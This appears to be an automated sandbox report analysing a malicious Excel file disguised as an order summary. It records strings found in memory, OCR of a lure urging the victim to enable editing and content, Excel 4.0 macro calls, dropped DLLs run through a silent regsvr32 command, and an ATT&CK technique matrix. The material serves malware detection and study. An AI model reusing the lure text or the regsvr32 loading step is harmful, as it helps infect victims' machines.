    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: https://sectigo.com/CPS0
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://settings.outlook.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://staging.cortana.ai
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://tasks.office.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://wus2.contentsync.
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://www.odwebp.svc.ms

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable editing " to unlock the editing document downloaded from the Internet. . , " El 14 Protecte
    Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start ' ,, , , 18 the decryption of
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: Order_Summary-9632850.xlsbInitial sample: CALL
    Source: Order_Summary-9632850.xlsbInitial sample: CALL
    Source: Order_Summary-9632850.xlsbInitial sample: EXEC
    Office process drops PE fileShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\kdldyeff.dllJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess Stats: CPU usage > 98%
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll 337A487F1CB8F16200A5D14CAC1DAC3478E95CF3077B3872D319970131BEA702
    Source: Joe Sandbox ViewDropped File: C:\Users\user\kdldyeff.dll 337A487F1CB8F16200A5D14CAC1DAC3478E95CF3077B3872D319970131BEA702
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
    Source: classification engineClassification label: mal88.expl.evad.winXLSB@5/10@0/1
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{9D11D15E-C66E-40D8-82BE-500D324727B3} - OProcSessId.datJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Order_Summary-9632850.xlsbInitial sample: OLE zip file path = xl/media/image1.png
    Source: Order_Summary-9632850.xlsbInitial sample: OLE zip file path = xl/media/image2.png
    Source: Order_Summary-9632850.xlsbInitial sample: OLE zip file path = xl/media/image3.png
    Source: Order_Summary-9632850.xlsbInitial sample: OLE zip file path = xl/media/image4.png
    Source: Order_Summary-9632850.xlsbInitial sample: OLE zip file path = xl/media/image5.png
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_029A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,3_2_029A1030
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_04602AF0 push dword ptr [edx+14h]; ret 3_2_04602BFD
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\kdldyeff.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\kdldyeff.dllJump to dropped file

    Boot Survival:

    barindex
    Drops PE files to the user root directoryShow sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\kdldyeff.dllJump to dropped file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dllJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_029A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,3_2_029A1030
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_029A1030 mov eax, dword ptr fs:[00000030h]3_2_029A1030
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_048E095E mov eax, dword ptr fs:[00000030h]3_2_048E095E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_048E0456 mov eax, dword ptr fs:[00000030h]3_2_048E0456
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_029A1030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,3_2_029A1030
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
    Source: Yara matchFile source: app.xml, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1DLL Side-Loading1Process Injection11Masquerading111OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsNative API1Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsExploitation for Client Execution42Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol21Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonRegsvr321Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values